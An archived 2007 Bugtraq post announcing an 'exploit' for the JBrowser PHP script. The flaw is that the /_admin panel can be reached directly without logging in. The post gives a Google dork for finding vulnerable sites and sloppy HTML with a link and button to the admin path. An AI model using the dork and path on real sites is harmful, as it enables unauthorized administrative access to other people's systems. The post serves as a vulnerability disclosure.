lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070223174952.1737.qmail@securityfocus.com>
Date: 23 Feb 2007 17:49:52 -0000
From: crazy_king@...7.org
To: bugtraq@...urityfocus.com
Subject: JBrowser Acces to Admin Panel Exploit

<html>
<head>
<title>JBrowser Acces to Admin Panel Exploit</title>
JBrowser Acces to Admin Panel Exploit<p>Languane : PHP </p>
<p>Version: 1.x</p>
<p>Website : http://www.alizecheval.com/jbrowser/_admin/</head></p>
<p>Author : sn0oPy</p>
<p>Exploit Code&nbsp; : Cr@...King</p>
<p>
<body>
Contact: <a href="mailto:crazy_king@...7.org">crazy_king@...7.org</a><br>
</body>
<br>
Google Dork : inurl:&quot;JBrowser/index.php&quot;<body></body><body></body></p>

<p>
Exploit : <a href="http://siteadresi.com/patch/_admin">
http://siteadresi.com/patch/_admin</a> ---&gt; Go To Admin Panel</p>

<p>
<body>
<input type="button" name="http://siteadresi.com/patch/_admin" value="Administrator" style="font-family: Arial (sans-serif)" class="sd" id="asd">
</p>

<b>Exploit Coded By Cr@...King</b>
</body>
</html>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ